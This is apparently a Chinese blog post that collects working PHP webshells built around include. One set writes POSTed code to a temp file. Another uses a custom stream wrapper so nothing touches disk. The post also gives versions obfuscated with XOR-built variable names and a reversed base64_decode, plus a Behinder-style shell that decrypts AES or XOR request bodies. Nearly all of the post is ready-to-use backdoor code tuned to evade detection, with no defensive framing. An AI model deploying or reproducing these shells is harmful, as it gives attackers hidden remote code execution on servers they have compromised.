include方式webshell

写文件include

1
2
3
4
//来源于网络
<?php
(~urldecode("%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C"))('temp.php','<?php '.$_POST[a].' ?>');include('temp.php');
?>
1
2
3
4
5
6
7
//来源于网络
<?php
$file = fopen("temp.php","w");
echo fwrite($file,"<?php ".$_POST[a].' ?>');
fclose($file);
include('temp.php');
?>

无文件落地include

通用蚁剑菜刀等

使用自定义协议将传入字符串当作文件include,无需写入文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$user="<?php ".$_POST[a].' ?>';
class VStream {
private $string;
private $position;
public function stream_open($path, $mode, $options, &$opened_path) {
$url = parse_url($path);
$id = $url["host"];
global $$id;
$this->string = $$id;
$this->position = 0;
return true;
}
public function stream_read($count) {
$ret = substr($this->string, $this->position, $count);
$this->position += strlen($ret);
return $ret;
}
public function stream_eof() {}
public function stream_stat() {}
}
stream_wrapper_register("var", "VStream");
include("var://user");
?>

进一步去除post特征并将流量b64编码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
function AtgI(){
$_1='_'.chr(51^99).chr(93^18).chr(70^21).chr(39^115);
return $_1;
}
$params = strrev(edoced_46esab)(${AtgI()}[a]);
$user="<?php ".$params.' ?>';
class VStream {
private $string;
private $position;
public function stream_open($path, $mode, $options, &$opened_path) {
$url = parse_url($path);
$id = $url["host"];
global $$id;
$this->string = $$id;
$this->position = 0;
return true;
}
public function stream_read($count) {
$ret = substr($this->string, $this->position, $count);
$this->position += strlen($ret);
return $ret;
}
public function stream_eof() {}
public function stream_stat() {}
}
stream_wrapper_register("var", "VStream");
include("var://user");
?>

behinder

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?php
@error_reporting(0);
session_start();
$key="dd42f170a6074880";
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");

for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];

$user='<?php @'.$params;
class VStream {
private $string;
private $position;
public function stream_open($path, $mode, $options, &$opened_path) {
$url = parse_url($path);
$id = $url["host"];
global $$id;
$this->string = $$id;
$this->position = 0;
return true;
}
public function stream_read($count) {
$ret = substr($this->string, $this->position, $count);
$this->position += strlen($ret);
return $ret;
}
public function stream_eof() {}
public function stream_stat() {}
}
stream_wrapper_register("var", "VStream");
include("var://user");
?>

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!